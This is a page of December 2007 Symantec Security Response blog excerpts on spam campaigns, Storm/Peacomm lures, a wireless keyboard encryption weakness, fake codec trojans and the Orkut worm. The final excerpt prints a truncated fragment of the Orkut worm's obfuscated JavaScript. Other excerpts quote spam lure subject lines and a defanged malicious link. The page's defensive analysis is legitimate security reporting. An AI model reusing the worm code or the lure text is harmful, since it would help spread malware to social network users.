Video Screencast Help
Symantec to Separate Into Two Focused, Industry-Leading Technology Companies. Learn more.
Security Response
Showing posts for December of 2007
Showing posts in English
Peter Coogan | 31 Dec 2007 08:00:00 GMT | 0 comments

After a quiet “Storm” front overThanksgiving, the Peacomm gang may be trying to make up for it now. Therecent Spam run, offering Mrs. Clausestrip shows, demonstrates that they are back to using their adeptsocial engineering techniques to dupe people into infecting theircomputers.

However, the Peacomm gang doesn’t seem content with their recentspam run and have launched a new one. Symantec is currently observing aspam run to celebrate New Years, 2008. Below is a list of some subjectlines seen in the latest Spam run:

• A New 2008 Year song
• A New Year song
• A brand New 2008 Year
• A brand New Year
• A fun packed New Year 2008 bash
• A new beginning, a new dawn!
• As the New 2008 Year...
• As the New Year...
• As you embrace another New Year 2008
• Blasting New 2008 Year...

Kelly Conley | 31 Dec 2007 08:00:00 GMT | 0 comments

Job offer spam has been around a while. Itused to work like this: spammer joins job hunting site as a prospectiveemployer, "researches" resumes of prospective employees, and then spamsthose individuals with job offers of home-based businesses. Or,sometimes no job hunting site was involved at all. It was just aspammer sending spam on a home-based business offer. Home-basedbusiness can be legitimate; however, if the offer comes to you via spamthan it most likely is not.

The spammers used to use the job hunting sites themselves to sendthe offers. The recipient would receive the job offer through the siteswhere they had uploaded their resumes and it all looked legitimateuntil they read what the "job offer" actually was. What we are seeingnow is spammers branching out. They appear to have collected the namesof job hunters through these sites and are now sending the job offersdirectly to the prospective employees without going through the jobhunting sites.

The emails...

Ashif Samnani | 28 Dec 2007 08:00:00 GMT | 0 comments

Wireless keyboards have been around for several years. Afterdeveloping the first series of infrared devices, vendors have developedradio-based keyboards that run at 27 MHz.

Researchers Max Moser and Phillip Schroedel of Dreamlab Technologiesrecently released a report stating that various 27MHz keyboard devicesare prone to an information disclosure vulnerability due to weakencryption (BID 26693).These devices include Microsoft’s Wireless Optical Desktop 1000 and2000 models. The researchers also claimed that the 3000 and 4000 modelsas well as other 27MHz-based wireless laser desktop series may also bevulnerable, but this has not been confirmed.

The researchers managed to break the encryption on these devices.They claim that Microsoft uses an 8-bit XOR mechanism to encryptwireless keystroke data. This means that there are only 2^8 or 256possibilities for the encryption key, which can...

Vikram Thakur | 27 Dec 2007 08:00:00 GMT | 0 comments

It’s been less than 24 hours since theformer Prime Minister of Pakistan was assassinated. As expected, themalware authors and distributors have already begun exploiting themorbid curiosity about Benazir Bhutto's death as a lure to spread theirmalice.

A simple search with terms such as "pakistan prime ministerassassination" yields results that include pages like the one shownbelow:

bhutto_youtube.gif

As some would expect, clicking on some of these links will mean that the old (technique-wise) ActiveX message box will appear:

bhutto_activex.gif

The problem with many of these links is that the ActiveX Object ismalicious. For example, following the link in the above image downloadsa malicious file hosted on a server in...

Vikram Thakur | 27 Dec 2007 08:00:00 GMT | 0 comments

t’s been less than 24 hours since the former Prime Minister ofPakistan was assassinated. As expected, the malware authors anddistributors have already begun exploiting the morbid curiosity aboutBenazir Bhutto's death as a lure to spread their malice.

A simple search with terms such as "pakistan prime ministerassassination" yields results that include pages like the one shownbelow:

bhutto_youtube.gif

As some would expect, clicking on some of these links will mean that the old (technique-wise) ActiveX message box will appear:

bhutto_activex.gif

The problem with many of these links is that the ActiveX Object ismalicious. For example, following the link in the above image downloadsa malicious file hosted on a server in Denmark...

Peter Ferrie | 27 Dec 2007 08:00:00 GMT | 0 comments

There should be no question anymore that the VX scene is dying.

On the 29A forum there was a post that roy g biv has officially leftthe 29A group. Given that Vallez has been silent for over a year, itseems clear that the 29A group is really dead now. We wish the boysluck in whatever legal pursuits that they find now.

On the EOF and DoomRiderz fora, we can read that neither group hasenough material for a new zine. On the rRlf site there's a message thatthe same thing has happened to them. EOF and DoomRiderz alreadyannounced their intention to produce a combined zine and now rRlf hasannounced that they will join in, too. Of course, if people aresubmitting the same thing to multiple groups in case one of themreleases a zine, then even those three groups combined might not haveenough material for a zine. In any case, it will probably not happenthis year.

This brings us to another point - the supposed AV-VX "symbioticrelationship." It should be clear by now...

Jitender Sarda | 24 Dec 2007 08:00:00 GMT | 0 comments

Penny stock spammers have started using ahigh definition video file format to promote stock symbols. As we comeup to the end of the year, spammers have moved quickly on using videoformats for spamming with pump-and-dump stock symbols. Traditionally inpenny stock spam, JPEG images were embedded in the email, followed byURLs that were redirected to other JPEG images. This year we havewitnessed huge rounds of PDF and MP3 file formats to promote stocksymbols.

Penny stock spammers have also used legitimate video commercials (TVand online media commercials) and clippings of professional financialnews reports or programs. Often there are conversations between thehost and the guest star "professional financial analyst," discussingthe company’s strategies and financial prospects. The following are acouple of sample messages of the penny stock spam email:

Date: Fri, 07 Dec 2007 03:21:59 -0500
From: [REMOVED]
To: [REMOVED]
Subject: Catch The Wave Video...

Shunichi Imano | 23 Dec 2007 08:00:00 GMT | 0 comments

Look, here comes Santa...on his sleigh withRudolph the red-nosed reindeer and a computer. This year, he seems tohave decided to distribute free gifts through email...but with a catch.

An email that contains a link to a malicious file reportedly arrives as the following:
Subject: Seasons Greetings
Message Body:

listen up,

This Christmas, we want to show you something you will really enjoy.
This might not be fun for the whole family, but I bet you'll like it come one take 2 min and check it out.
hxxp://merrychrist[REMOVED]

If you click on the links, you will find pictures of women dressedas "Mrs. Clause" on the site and the malicious file stripshow.exe,which is a new variant of Trojan.Peacomm.D,
will be downloaded if you click on the picture.

...

Andrea Lelli | 21 Dec 2007 08:00:00 GMT | 0 comments

New fake codec Web sites often appear outof nowhere (we are pretty used to seeing them) and in most cases if youdownload and run the "codec" you get infected with a variant ofTrojan.Zlob. Nothing new, but this time I found something different. Iwas testing a fake codec Web site when I came upon a new variant. Theinstallation step is the usual:


Figure 1: Standard installation process

However, after that the browser is started with a Google search forthe word “sex.” The interesting stuff is that while browsing, you willnow be frequently faced with this popup:

...

Umesh Wanve | 20 Dec 2007 08:00:00 GMT | 0 comments

Orkut is a popular social networking sitewith millions of registered users. A couple of days ago Orkut was hitwith a worm that impacted close to 700,000 users in approximately 24hours. We took a closer look at the exploit to get an idea of why somany users' systems were infected. The exploit was contained in aJavaScript file, aptly named "virus.js" file, which was injected usingan embed tag. Here is a snippet of the JavaScript file:

function $(p,a,c,k,e,d) {
 e=function(c) {
  return(c35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
 while(c--){d[e(c)]=k[c]||e(c)}
 k=[function(e){return d[e]}];
 e=function(){return'\\w+'};
 c=1
};
while(c--){
 if(k[c]){
  p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
 }
 }
return p
};
setTimeout(
$('5...